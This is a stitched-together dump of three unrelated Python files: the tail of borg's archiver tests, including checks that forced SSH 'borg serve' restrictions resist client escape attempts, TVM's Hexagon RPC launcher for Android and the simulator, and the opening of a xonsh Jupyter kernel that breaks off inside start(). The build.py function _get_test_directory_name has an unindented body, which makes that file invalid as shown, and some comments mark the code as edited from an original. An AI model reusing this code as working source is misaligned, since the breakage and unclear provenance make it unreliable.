        self.create_regular_file('d_file_added', size=256)
        self.cmd('create', self.repository_location + '::test1', 'input')
        output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
        expected = [
            'a_file_removed',
            'b_file_added',
            'c_file_changed',
            'd_file_added',
            'e_file_changed',
            'f_file_removed',
        ]
        # each output line, in order, must mention the corresponding expected path
        assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
    """get_args() must honor the forced (SSH) server command and ignore any
    attempt by the client command line to weaken the configured restrictions.

    The first argument is argv as produced by the ssh forced command, the
    second is the equivalent of the SSH_ORIGINAL_COMMAND environment variable.
    """
    archiver = Archiver()
    path_restricted = ['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ]
    repo_restricted = ['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ]

    # everything normal: benign client command, restrictions from the forced command apply
    args = archiver.get_args(path_restricted, 'borg serve --info --umask=0027')
    assert args.func == archiver.do_serve
    assert args.restrict_to_paths == ['/p1', '/p2']
    assert args.umask == 0o027
    assert args.log_level == 'info'

    # similar, but with --restrict-to-repository
    args = archiver.get_args(repo_restricted, 'borg serve --info --umask=0027')
    assert args.restrict_to_repositories == ['/r1', '/r2']

    # client tries to break out of the path restriction
    args = archiver.get_args(path_restricted, 'borg serve --restrict-to-path=/')
    assert args.restrict_to_paths == ['/p1', '/p2']

    # client tries to break out of the repository restriction
    args = archiver.get_args(repo_restricted, 'borg serve --restrict-to-repository=/')
    assert args.restrict_to_repositories == ['/r1', '/r2']

    # client tries to sneak below the allowed repository
    args = archiver.get_args(repo_restricted, 'borg serve --restrict-to-repository=/r1/below')
    assert args.restrict_to_repositories == ['/r1', '/r2']

    # client tries to execute a different subcommand entirely
    args = archiver.get_args(path_restricted, 'borg init --encryption=repokey /')
    assert args.func == archiver.do_serve

    # Check that environment variables in the forced command don't cause issues. If the command
    # were not forced, environment variables would be interpreted by the shell, but this does not
    # happen for forced commands - we get the verbatim command line and need to deal with env vars.
    args = archiver.get_args(['borg', 'serve', ], 'BORG_FOO=bar borg serve --info')
    assert args.func == archiver.do_serve
def test_chunk_content_equal():
    """ItemDiff._chunk_content_equal() compares two chunk streams by content,
    independent of how the bytes are split into chunks, and symmetrically."""
    def equal_both_ways(left, right):
        # materialize once so we can hand out fresh iterators for each direction
        left_chunks = list(left)
        right_chunks = list(right)
        forward = ItemDiff._chunk_content_equal(iter(left_chunks), iter(right_chunks))
        backward = ItemDiff._chunk_content_equal(iter(right_chunks), iter(left_chunks))
        # the comparison must not depend on argument order
        assert forward == backward
        return forward

    # identical bytes, different chunk boundaries -> equal
    assert equal_both_ways([b'1234', b'567A', b'bC'],
                           [b'1', b'23', b'4567A', b'b', b'C'])
    # one iterator exhausted before the other
    assert not equal_both_ways([b'12345'],
                               [b'1234', b'56'])
    # content mismatch
    assert not equal_both_ways([b'1234', b'65'],
                               [b'1234', b'56'])
    # first is the prefix of second
    assert not equal_both_ways([b'1234', b'56'],
                               [b'1234', b'565'])
class TestBuildFilter:
    """Tests for Archiver.build_filter()."""

    @staticmethod
    def peek_and_store_hardlink_masters(item, matched):
        # no-op stand-in for the real hardlink-master bookkeeping callback
        pass

    def test_basic(self):
        """An include pattern matches the path itself and everything below it."""
        matcher = PatternMatcher()
        matcher.add([parse_pattern('included')], IECommand.Include)
        item_filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
        assert item_filter(Item(path='included'))
        assert item_filter(Item(path='included/file'))
        assert not item_filter(Item(path='something else'))

    def test_empty(self):
        """With no patterns and fallback=True, everything passes the filter."""
        matcher = PatternMatcher(fallback=True)
        item_filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
        assert item_filter(Item(path='anything'))

    def test_strip_components(self):
        """Paths with fewer components than strip_components are filtered out."""
        matcher = PatternMatcher(fallback=True)
        item_filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
        assert not item_filter(Item(path='shallow'))
        assert not item_filter(Item(path='shallow/'))  # can this even happen? paths are normalized...
        assert item_filter(Item(path='deep enough/file'))
        assert item_filter(Item(path='something/dir/file'))
class TestCommonOptions:
    """Tests for Archiver.CommonOptions: common flags must be accepted both
    before and after the subcommand, with the later occurrence winning."""

    @staticmethod
    def define_common_options(add_common_option):
        # a miniature set of "common options", mirroring how the real parser defines them
        add_common_option('-h', '--help', action='help', help='show this help message and exit')
        add_common_option('--critical', dest='log_level', help='foo',
                          action='store_const', const='critical', default='warning')
        add_common_option('--error', dest='log_level', help='foo',
                          action='store_const', const='error', default='warning')
        add_common_option('--append', dest='append', help='foo',
                          action='append', metavar='TOPIC', default=[])
        add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
        add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
                          help='(default: %(default)d).')

    @pytest.fixture
    def basic_parser(self):
        """Bare top-level parser with the CommonOptions helper attached."""
        parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
        parser.common_options = Archiver.CommonOptions(self.define_common_options,
                                                       suffix_precedence=('_level0', '_level1'))
        return parser

    @pytest.fixture
    def subparsers(self, basic_parser):
        if sys.version_info >= (3, 7):
            # py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
            return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
        else:
            # py36 does not support required=... argument (but behaves like required=False).
            # note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
            return basic_parser.add_subparsers(title='required arguments', metavar='<command>')

    @pytest.fixture
    def parser(self, basic_parser):
        """Top-level parser carrying the '_level0' common option group (with defaults)."""
        basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
        return basic_parser

    @pytest.fixture
    def common_parser(self, parser):
        """Parent parser carrying the '_level1' common option group (no defaults)."""
        common_parser = argparse.ArgumentParser(add_help=False, prog='test')
        parser.common_options.add_common_group(common_parser, '_level1')
        return common_parser

    @pytest.fixture
    def parse_vars_from_line(self, parser, subparsers, common_parser):
        """Return a helper that parses a command line, resolves the layered
        common options, and returns the namespace as a plain dict."""
        subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
                                          description='foo', epilog='bar', help='baz',
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=1234)
        subparser.add_argument('--append-only', dest='append_only', action='store_true')

        def parse_vars_from_line(*line):
            print(line)
            args = parser.parse_args(line)
            parser.common_options.resolve(args)
            return vars(args)
        return parse_vars_from_line

    def test_simple(self, parse_vars_from_line):
        assert parse_vars_from_line('--error') == {
            'append': [],
            'lock_wait': 1,
            'log_level': 'error',
            'progress': False
        }

        # the occurrence after the subcommand wins over the one before it
        assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
            'append': [],
            'lock_wait': 1,
            'log_level': 'critical',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }

        # subcommand-only option given before the subcommand: parse error
        with pytest.raises(SystemExit):
            parse_vars_from_line('--append-only', 'subcommand')

        # append-type options accumulate across both positions
        assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
            'append': ['foo', 'bar', 'baz'],
            'lock_wait': 1,
            'log_level': 'warning',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }

    @pytest.mark.parametrize('position', ('before', 'after', 'both'))
    @pytest.mark.parametrize('flag,args_key,args_value', (
        ('-p', 'progress', True),
        ('--lock-wait=3', 'lock_wait', 3),
    ))
    def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
        """A common flag must have the same effect whether it appears before,
        after, or on both sides of the subcommand."""
        line = []
        if position in ('before', 'both'):
            line.append(flag)
        line.append('subcommand')
        if position in ('after', 'both'):
            line.append(flag)

        result = {
            'append': [],
            'lock_wait': 1,
            'log_level': 'warning',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }
        result[args_key] = args_value

        assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
    """'50M' parses to 50 * 1000**2 bytes; a too-small quota is rejected."""
    expected_bytes = 50 * 1000 ** 2
    assert parse_storage_quota('50M') == expected_bytes
    # below the accepted minimum -> argparse-style rejection
    with pytest.raises(argparse.ArgumentTypeError):
        parse_storage_quota('5M')
def get_all_parsers():
    """
    Return dict mapping command to parser.

    Walks the borg/borgfs argparse trees recursively; nested subcommands are
    keyed as 'parent child' (space-separated prefix).
    """
    parser = Archiver(prog='borg').build_parser()
    borgfs_parser = Archiver(prog='borgfs').build_parser()
    parsers = {}

    # Note vs. original: the inner loop used to rebind the 'parser' parameter
    # while still using it, and took an unused 'Archiver' parameter shadowing
    # the class; both cleaned up here without behavior change.
    def discover_level(prefix, parser, extra_choices=None):
        # collect this level's subcommand -> subparser mapping
        choices = {}
        for action in parser._actions:
            if action.choices is not None and 'SubParsersAction' in str(action.__class__):
                for cmd, subparser in action.choices.items():
                    choices[prefix + cmd] = subparser
        if extra_choices is not None:
            choices.update(extra_choices)
        if prefix and not choices:
            return
        for command, subparser in sorted(choices.items()):
            discover_level(command + " ", subparser)
            parsers[command] = subparser

    discover_level("", parser, {'borgfs': borgfs_parser})
    return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
    """Every lazily rendered epilog must carry non-empty RST source."""
    epilog = parser.epilog
    if isinstance(epilog, RstToTextLazy):
        assert epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
    """Each help topic must render to a non-empty terminal string."""
    rendered = rst_to_terminal(helptext)
    assert str(rendered)
|
build.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Defines top-level glue functions for building Hexagon."""
import abc
import datetime
import multiprocessing as mp
import os
import pathlib
import signal
import stat
import subprocess
from typing import Union
import tvm
from ..._ffi import libinfo
from .session import Session
HEXAGON_RPC_LIB_DIR = os.environ.get("HEXAGON_RPC_LIB_DIR")
def _get_hexagon_rpc_lib_dir() -> pathlib.Path:
    """Find the Hexagon API binaries.

    Returns
    -------
    pathlib.Path :
        The path to the Hexagon API directory.

    Raises
    ------
    RuntimeError
        If no binaries are found and HEXAGON_RPC_LIB_DIR is not set.
    """
    global HEXAGON_RPC_LIB_DIR
    if HEXAGON_RPC_LIB_DIR is None:
        # Not configured via the environment: look for a "hexagon_api_output"
        # directory next to any of the discovered TVM libraries.
        candidates = (
            os.path.join(os.path.dirname(p), "hexagon_api_output")
            for p in libinfo.find_lib_path()
        )
        for rpc_dir in candidates:
            if os.path.isdir(rpc_dir):
                HEXAGON_RPC_LIB_DIR = rpc_dir  # cache for subsequent calls
                break
        else:
            raise RuntimeError("hexagon_api binaries not found, please define HEXAGON_RPC_LIB_DIR")
    return pathlib.Path(HEXAGON_RPC_LIB_DIR)
def _get_test_directory_name() -> str:
"""Generate a time-stamped name for use as a test directory name."""
return datetime.datetime.now().strftime("%Y-%m-%dT%H-%M-%S")
class HexagonLauncherRPC(metaclass=abc.ABCMeta):
    """Base class for RPC-based launchers.

    This is an abstract class intended to be a base class for specific
    implementations of RPC launchers. There are two public methods that
    each launcher needs to implement:
    - start_server
    - stop_server
    and two "private" methods used in setting up the environment:
    - _copy_to_remote
    - _create_remote_directory

    The basic flow of interaction with the launcher is

        launcher = HexagonLauncher(...)
        launcher.start_server()
        with launcher.start_session() as session:
            # Do something with the session
        launcher.stop_server()
    """

    # Key under which the remote RPC server registers with the RPC tracker.
    HEXAGON_REMOTE_DEVICE_KEY = "hexagon-dev"

    def __init__(self, rpc_info: dict, workspace: Union[str, pathlib.Path] = None):
        """Configure HexagonLauncherRPC.

        Parameters
        ----------
        rpc_info : dict
            Description of the RPC setup. Recognized keys:
              "rpc_tracker_host" : str  name of the host running the tracker (default "0.0.0.0")
              "rpc_tracker_port" : int  port number of the tracker (default: 9190)
              "rpc_server_port"  : int  port number for the RPC server to use (default 7070)
              "workspace_base"   : str  name of base test directory (default ".")
        workspace : str or pathlib.Path
            The server's remote working directory. If this directory does not
            exist, it will be created. If it does exist, the server must have
            write permissions to it.
            If this parameter is None, a subdirectory in the `workspace_base`
            directory will be created, otherwise the `workspace_base` is not
            used.
        """
        # Defaults first; caller-supplied rpc_info entries override them.
        self._rpc_info = {
            "rpc_tracker_host": "0.0.0.0",
            "rpc_tracker_port": 9190,
            "rpc_server_port": 7070,
            "workspace_base": ".",
        }
        self._rpc_info.update(rpc_info)
        self._workspace = self._create_workspace(workspace)

    @abc.abstractmethod
    def start_server(self):
        """Start the RPC server"""
        ...

    @abc.abstractmethod
    def stop_server(self):
        """Stop the RPC server"""
        ...

    @abc.abstractmethod
    def _copy_to_remote(
        self, local_path: Union[str, pathlib.Path], remote_path: Union[str, pathlib.Path]
    ):
        """Copy a local file to a remote location.

        Parameters
        ----------
        local_path : str or pathlib.Path
            Path to the local file.
        remote_path : str or pathlib.Path
            Path to the remote file (to be written).
        """
        ...

    @abc.abstractmethod
    def _create_remote_directory(self, remote_path: Union[str, pathlib.Path]):
        """Create a directory in the remote location.

        Parameters
        ----------
        remote_path : str or pathlib.Path
            Name of the directory to be created.
        """
        ...

    def _create_workspace(self, workspace: Union[str, pathlib.Path]) -> pathlib.Path:
        """Create a working directory for the server.

        Parameters
        ----------
        workspace : str or pathlib.Path or NoneType
            Name of the directory to create. If None, a new name is constructed
            using workspace_base.

        Returns
        -------
        pathlib.Path :
            Created workspace.
        """
        if not workspace:
            # No explicit workspace: derive a unique time-stamped
            # subdirectory under the configured base directory.
            base_dir = self._rpc_info["workspace_base"]
            workspace = os.path.join(base_dir, _get_test_directory_name())
        self._create_remote_directory(workspace)
        return pathlib.Path(workspace)

    def upload(self, local_path: Union[str, pathlib.Path], remote_filename: str):
        """Upload a local file to the remote workspace.

        Parameters
        ----------
        local_path : str or pathlib.Path
            Path to the local file to be copied.
        remote_filename : str
            Name of the file in the remote workspace.
        """
        assert self._workspace
        self._copy_to_remote(local_path, os.path.join(str(self._workspace), remote_filename))

    def start_session(self) -> Session:
        """Connect to the RPC server.

        Returns
        -------
        Session :
            The session object.
        """
        hexagon_remote_kw = {
            "host": self._rpc_info["rpc_tracker_host"],
            "port": self._rpc_info["rpc_tracker_port"],
            "priority": 0,
            "timeout": 0,
            "key": self.HEXAGON_REMOTE_DEVICE_KEY,
        }
        return Session(hexagon_remote_kw)

    def load_module(self, module_name: Union[str, pathlib.Path], session: Session):
        """Load TVM module.

        Parameters
        ----------
        module_name : str or pathlib.Path
            Name of the module to load. It must be either a bare file name
            (without any path components), or a full path in the remote
            system. If it is a file name, the file must be placed in the
            remote workspace.
        session : Session
            Remote session. The session must be established (via __enter__)
            prior to calling this function.

        Returns
        -------
        TVMModule :
            TVM module object.
        """
        return session.load_module(module_name)

    def get_graph_executor(
        self, graph_json: str, module_name: Union[str, pathlib.Path], session: Session
    ):
        """Create a local GraphModule which consumes a remote libmod.

        Parameters
        ----------
        graph_json : str
            The string with the graph JSON.
        module_name : str or pathlib.Path
            Remote module filename. Same restrictions apply as in load_module().
        session : Session
            Remote session. The session must be established (via __enter__)
            prior to calling this function.

        Returns
        -------
        GraphModule :
            Runtime graph module that can be used to execute the graph.
        """
        graph_mod = self.load_module(module_name, session)
        return tvm.contrib.graph_executor.create(graph_json, graph_mod, session.device)

    def get_aot_executor(self, module_name: Union[str, pathlib.Path], session: Session):
        """Create a local AoTModule which consumes a remote libmod.

        Parameters
        ----------
        module_name : str or pathlib.Path
            Remote module filename. Same restrictions apply as in load_module().
        session : Session
            Remote session. The session must be established (via __enter__)
            prior to calling this function.

        Returns
        -------
        aot_module : AotModule
            Runtime AOT module that can be used to execute.
        """
        aot_mod = self.load_module(module_name, session)
        return tvm.runtime.executor.AotModule(aot_mod["default"](session.device))
class HexagonLauncherAndroid(HexagonLauncherRPC):
    """Hexagon Launcher for Android."""

    # Default base directory for test workspaces on the device.
    ANDROID_HEXAGON_TEST_BASE_DIR = pathlib.Path("/data/local/tmp/hexagon_test")
    # Files that must be pushed to the device for the RPC server to run.
    ANDROID_HEXAGON_RPC_FILES = [
        "android_bash.sh",
        "libhexagon_rpc_skel.so",
        "libtvm_runtime.so",
        "tvm_rpc_android",
    ]

    def __init__(
        self,
        serial_number: str,
        rpc_info: dict,
        workspace: Union[str, pathlib.Path] = None,
    ):
        """Configure a new HexagonLauncherAndroid

        Parameters
        ----------
        serial_number : str
            Android device serial number.
        rpc_info : dict
            Same as in HexagonLauncherRPC, except if the "workspace_base"
            key is not present or is None, ANDROID_HEXAGON_TEST_BASE_DIR
            is used as the base directory. The optional "adb_server_socket"
            key selects the adb server address (default "tcp:5037").
        workspace : str or pathlib.Path, optional
            Test workspace path on android.
        """
        if not rpc_info.get("workspace_base"):
            rpc_info["workspace_base"] = self.ANDROID_HEXAGON_TEST_BASE_DIR
        self._serial_number = serial_number
        # Use .get() so a missing "adb_server_socket" key falls back to the
        # default adb server address instead of raising KeyError.
        adb_socket = rpc_info.get("adb_server_socket") or "tcp:5037"
        self._adb_device_sub_cmd = ["adb", "-L", adb_socket, "-s", self._serial_number]
        super(HexagonLauncherAndroid, self).__init__(rpc_info, workspace)

    def _copy_to_remote(
        self, local_path: Union[str, pathlib.Path], remote_path: Union[str, pathlib.Path]
    ):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        subprocess.check_call(
            self._adb_device_sub_cmd + ["push", str(local_path), str(remote_path)]
        )

    def _create_remote_directory(self, remote_path: Union[str, pathlib.Path]):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        subprocess.check_call(self._adb_device_sub_cmd + ["shell", "mkdir", "-p", str(remote_path)])

    def _copy_binaries(self):
        """Upload Android server binaries."""
        # Create bash script from the template, substituting the RPC
        # connection placeholders with the configured values.
        android_bash_script_path = _get_hexagon_rpc_lib_dir() / "android_bash.sh"
        with open(_get_hexagon_rpc_lib_dir() / "android_bash.sh.template", "r") as src_f:
            if os.path.exists(android_bash_script_path):
                os.remove(android_bash_script_path)
            with open(android_bash_script_path, "w") as dest_f:
                for line in src_f.readlines():
                    if "<RPC_TRACKER_HOST>" in line:
                        line = line.replace(
                            "<RPC_TRACKER_HOST>", str(self._rpc_info["rpc_tracker_host"])
                        )
                    if "<RPC_TRACKER_PORT>" in line:
                        line = line.replace(
                            "<RPC_TRACKER_PORT>", str(self._rpc_info["rpc_tracker_port"])
                        )
                    if "<HEXAGON_REMOTE_DEVICE_KEY>" in line:
                        line = line.replace(
                            "<HEXAGON_REMOTE_DEVICE_KEY>", self.HEXAGON_REMOTE_DEVICE_KEY
                        )
                    if "<RPC_SERVER_PORT>" in line:
                        line = line.replace(
                            "<RPC_SERVER_PORT>", str(self._rpc_info["rpc_server_port"])
                        )
                    dest_f.write(line)
        # Make shell script executable
        android_bash_stat = os.stat(android_bash_script_path)
        os.chmod(android_bash_script_path, android_bash_stat.st_mode | stat.S_IEXEC)
        # Push files
        lib_dir = _get_hexagon_rpc_lib_dir()
        for item in self.ANDROID_HEXAGON_RPC_FILES:
            self._copy_to_remote(lib_dir / item, self._workspace / item)

    def _run_server_script(self):
        """Setup the ADB connection and execute the server script."""
        # Remove pre-defined forward/reverse rules
        subprocess.check_call(self._adb_device_sub_cmd + ["forward", "--remove-all"])
        subprocess.check_call(self._adb_device_sub_cmd + ["reverse", "--remove-all"])
        # Enable port reverse for RPC tracker
        rpc_tracker_port = self._rpc_info["rpc_tracker_port"]
        rpc_server_port = self._rpc_info["rpc_server_port"]
        subprocess.check_call(
            self._adb_device_sub_cmd
            + ["reverse", f"tcp:{rpc_tracker_port}", f"tcp:{rpc_tracker_port}"]
        )
        # Enable port forward for RPC server. We forward 9 ports after the rpc_server_port.
        for i in range(0, 10):
            subprocess.check_call(
                self._adb_device_sub_cmd
                + ["forward", f"tcp:{rpc_server_port+i}", f"tcp:{rpc_server_port+i}"]
            )
        # Run server and connect to tracker; the process is left running
        # in the background (stopped later via stop_server()).
        subprocess.Popen(
            self._adb_device_sub_cmd + ["shell", f"cd {self._workspace} && ./android_bash.sh"],
            stdout=subprocess.PIPE,
            stdin=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )

    def start_server(self):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        self._copy_binaries()
        self._run_server_script()

    def stop_server(self):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        # Kill process children first, then the main process; the server's
        # pid is recorded in rpc_pid.txt by the startup script.
        subprocess.Popen(
            self._adb_device_sub_cmd + ["shell", f"pkill -P `cat {self._workspace}/rpc_pid.txt`"]
        )
        # Kill main process
        subprocess.Popen(
            self._adb_device_sub_cmd + ["shell", f"kill `cat {self._workspace}/rpc_pid.txt`"]
        )
class HexagonLauncherSimulator(HexagonLauncherRPC):
    """Hexagon Launcher for Hexagon simulator."""

    # Binaries needed to run the RPC server on the (x86) host.
    SIMULATOR_HEXAGON_RPC_FILES = ["tvm_rpc_x86", "libhexagon_rpc_sim.so"]

    def __init__(self, rpc_info: dict, workspace: Union[str, pathlib.Path] = None):
        """Configure a new HexagonLauncherSimulator

        Parameters are same as for HexagonLauncherRPC.

        Raises
        ------
        RuntimeError
            If the HEXAGON_TOOLCHAIN environment variable is not set.
        """
        super(HexagonLauncherSimulator, self).__init__(rpc_info, workspace)
        self._toolchain = os.environ.get("HEXAGON_TOOLCHAIN")
        if not self._toolchain:
            raise RuntimeError("Please set HEXAGON_TOOLCHAIN env variable")

    def _copy_to_remote(
        self, local_path: Union[str, pathlib.Path], remote_path: Union[str, pathlib.Path]
    ):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        # "Remote" is the local filesystem for the simulator.
        subprocess.check_call(["cp", str(local_path), str(remote_path)])

    def _create_remote_directory(self, remote_path: Union[str, pathlib.Path]):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        subprocess.check_call(["mkdir", "-p", str(remote_path)])

    def _copy_libcxx(self, dest_dir: Union[str, pathlib.Path]):
        """Copy libc++ libraries to the remote workspace."""
        # Copy the v68 versions, since we don't have target information.
        # The v68 ones should work everywhere on v68+.
        lib_dir = os.path.join(self._toolchain, "target/hexagon/lib/v68/G0/pic")
        libcxx_files = []
        for entry in os.scandir(lib_dir):
            # Only regular shared-object files whose name starts with libc++.
            if entry.is_dir() or entry.name.find(".so") == -1:
                continue
            if entry.name.startswith("libc++"):
                libcxx_files.append(entry.name)
        # Use tar to preserve the symbolic links. Libc++ libraries use the
        # typical .so versioning, so that libc++.so may be a symlink to
        # something else. Also, shared libraries using libc++ could be
        # directly linked against some version, e.g. libc++.so.1, so make
        # sure that all files are copied over. The preservation of symbolic
        # links is to save disk space.
        tar_in = f"tar -cf - -C {lib_dir} " + " ".join(libcxx_files)
        tar_out = f"tar -xf - -C {str(dest_dir)}"
        subprocess.check_call(tar_in + " | " + tar_out, shell=True)

    def start_server(self):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        # Copy binaries
        lib_dir = _get_hexagon_rpc_lib_dir()
        for item in self.SIMULATOR_HEXAGON_RPC_FILES:
            self._copy_to_remote(lib_dir / item, self._workspace / item)
        # Copy libc++ from the toolchain to the workspace
        self._copy_libcxx(self._workspace)
        rpc_tracker_host = self._rpc_info["rpc_tracker_host"]
        rpc_tracker_port = self._rpc_info["rpc_tracker_port"]
        rpc_server_port = self._rpc_info["rpc_server_port"]
        server_exe = os.path.join(".", "tvm_rpc_x86")
        args = [
            "server",
            f"--tracker={rpc_tracker_host}:{rpc_tracker_port}",
            f"--port={rpc_server_port}",
            f"--key={self.HEXAGON_REMOTE_DEVICE_KEY}",
            "--timeout=0",
        ]

        # pylint: disable=unused-argument
        def _terminate_handler(self, signum, *rest):
            # Terminate the Popen'ed (sub)process.
            os.kill(self._subprocess_pid, signal.SIGTERM)

        def _start(self):
            # This function will be running in a new process. It will start the RPC
            # (x86) server as a subprocess of itself.
            log_out = self._workspace / "stdout.txt"
            log_err = self._workspace / "stderr.txt"
            # Intercept the TERM signal so we can also terminate the subprocess.
            signal.signal(signal.SIGTERM, lambda *a: _terminate_handler(self, *a))
            with open(log_out, "w") as out, open(log_err, "w") as err:
                p = subprocess.Popen(
                    [server_exe, *args], stdout=out, stderr=err, cwd=self._workspace
                )
                # Insert the pid of the subprocess in the self object.
                self._subprocess_pid = p.pid
                p.wait()

        # Launch _start in a separate process; terminating that process (via
        # stop_server) triggers the SIGTERM handler, which in turn kills the
        # RPC server subprocess.
        self._server_process = mp.Process(target=lambda *a: _start(self, *a))
        self._server_process.start()

    def stop_server(self):
        """Abstract method implementation. See description in HexagonLauncherRPC."""
        self._server_process.terminate()
# pylint: disable=invalid-name
def HexagonLauncher(
    serial_number: str,
    rpc_info: dict,
    workspace: Union[str, pathlib.Path] = None,
):
    """Factory: build the simulator launcher for serial number "simulator",
    otherwise an Android launcher for the given device."""
    if serial_number != "simulator":
        return HexagonLauncherAndroid(serial_number, rpc_info, workspace)
    return HexagonLauncherSimulator(rpc_info, workspace)
|
jupyter_kernel.py | # -*- coding: utf-8 -*-
"""Hooks for Jupyter Xonsh Kernel."""
import sys
import json
import hmac
import uuid
import errno
import hashlib
import datetime
import builtins
import threading
from pprint import pformat
from argparse import ArgumentParser
from collections.abc import Set
import zmq
from zmq.eventloop import ioloop, zmqstream
from zmq.error import ZMQError
from xonsh import __version__ as version
from xonsh.main import setup
from xonsh.completer import Completer
from xonsh.commands_cache import predict_true
MAX_SIZE = 8388608 # 8 Mb
DELIM = b"<IDS|MSG>"
def dump_bytes(*args, **kwargs):
    """Converts an object to JSON and returns the bytes."""
    text = json.dumps(*args, **kwargs)
    return text.encode("ascii")
def load_bytes(b):
    """Converts bytes of JSON to an object."""
    text = b.decode("ascii")
    return json.loads(text)
def bind(socket, connection, port):
    """Binds a socket to a port, or a random port if needed. Returns the port."""
    if port > 0:
        # Explicit port requested: bind to "<connection>:<port>".
        socket.bind("{}:{}".format(connection, port))
        return port
    # Non-positive port means "pick one for me".
    return socket.bind_to_random_port(connection)
class XonshKernel:
    """Xonsh kernel for Jupyter, implementing the Jupyter wire protocol
    directly over ZeroMQ sockets (heartbeat, iopub, control, stdin, shell)."""

    implementation = "Xonsh " + version
    implementation_version = version
    language = "xonsh"
    language_version = version.split(".")[:3]
    banner = "Xonsh - Python-powered, cross-platform shell"
    language_info = {
        "name": "xonsh",
        "version": version,
        "pygments_lexer": "xonsh",
        "codemirror_mode": "shell",
        "mimetype": "text/x-sh",
        "file_extension": ".xsh",
    }
    # Supported message-signature schemes, per the Jupyter wire protocol.
    signature_schemes = {"hmac-sha256": hashlib.sha256}

    def __init__(self, debug_level=0, session_id=None, config=None, **kwargs):
        """
        Parameters
        ----------
        debug_level : int, optional
            Integer from 0 (no debugging) to 3 (all debugging), default: 0.
        session_id : str or None, optional
            Unique string id representing the kernel session. If None, this will
            be replaced with a random UUID.
        config : dict or None, optional
            Configuration dictionary to start server with. By default will
            search the command line for options (if given) or use default
            configuration.
        """
        self.debug_level = debug_level
        self.session_id = str(uuid.uuid4()) if session_id is None else session_id
        self._parser = None
        self.config = self.make_default_config() if config is None else config
        self.exiting = False
        self.execution_count = 1
        self.completer = Completer()

    @property
    def parser(self):
        """Lazily-constructed argument parser for the kernel command line."""
        if self._parser is None:
            # BUGFIX: program name was misspelled "jupyter_kerenel".
            p = ArgumentParser("jupyter_kernel")
            p.add_argument("-f", dest="config_file", default=None)
            self._parser = p
        return self._parser

    def make_default_config(self):
        """Provides default configuration"""
        ns, unknown = self.parser.parse_known_args(sys.argv)
        if ns.config_file is None:
            # No connection file given: listen on random local ports with a
            # freshly generated HMAC key.
            self.dprint(1, "Starting xonsh kernel with default args...")
            config = {
                "control_port": 0,
                "hb_port": 0,
                "iopub_port": 0,
                "ip": "127.0.0.1",
                "key": str(uuid.uuid4()),
                "shell_port": 0,
                "signature_scheme": "hmac-sha256",
                "stdin_port": 0,
                "transport": "tcp",
            }
        else:
            self.dprint(1, "Loading simple_kernel with args:", sys.argv)
            self.dprint(1, "Reading config file {!r}...".format(ns.config_file))
            with open(ns.config_file) as f:
                config = json.load(f)
        return config

    def iopub_handler(self, message):
        """Handles iopub requests."""
        self.dprint(2, "iopub received:", message)

    def control_handler(self, wire_message):
        """Handles control requests"""
        self.dprint(1, "control received:", wire_message)
        identities, msg = self.deserialize_wire_message(wire_message)
        # Only shutdown requests are acted upon on the control channel.
        if msg["header"]["msg_type"] == "shutdown_request":
            self.shutdown()

    def stdin_handler(self, message):
        """Handles (and merely logs) stdin channel messages."""
        self.dprint(2, "stdin received:", message)

    def start(self):
        """Starts the server"""
        ioloop.install()
        connection = self.config["transport"] + "://" + self.config["ip"]
        secure_key = self.config["key"].encode()
        digestmod = self.signature_schemes[self.config["signature_scheme"]]
        self.auth = hmac.HMAC(secure_key, digestmod=digestmod)
        # Heartbeat
        ctx = zmq.Context()
        self.heartbeat_socket = ctx.socket(zmq.REP)
        self.config["hb_port"] = bind(
            self.heartbeat_socket, connection, self.config["hb_port"]
        )
        # IOPub/Sub, also called SubSocketChannel in IPython sources
        self.iopub_socket = ctx.socket(zmq.PUB)
        self.config["iopub_port"] = bind(
            self.iopub_socket, connection, self.config["iopub_port"]
        )
        self.iopub_stream = zmqstream.ZMQStream(self.iopub_socket)
        self.iopub_stream.on_recv(self.iopub_handler)
        # Control
